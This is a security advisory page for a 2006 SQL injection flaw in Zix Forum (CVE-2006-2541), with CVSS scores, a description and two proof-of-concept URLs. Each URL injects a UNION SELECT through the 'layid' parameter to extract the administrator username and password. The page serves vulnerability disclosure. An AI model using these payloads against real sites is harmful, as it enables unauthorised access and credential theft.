Bug: Zix Forum <= 1.12 (layid) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Published
Credit
Risk
2006.05.25
i6d hotmail com
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2006-2541
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Vulnerability:

--------------------

SQL_Injection:

Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL
query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Successful exploitation extracts username and password of administrator in clear text .

Proof of Concepts:

--------------------

site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,n
ull,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'

site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1
,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1
,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'

-------

By PHP Emperor

# i6d[at]hotmail[dot]com

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version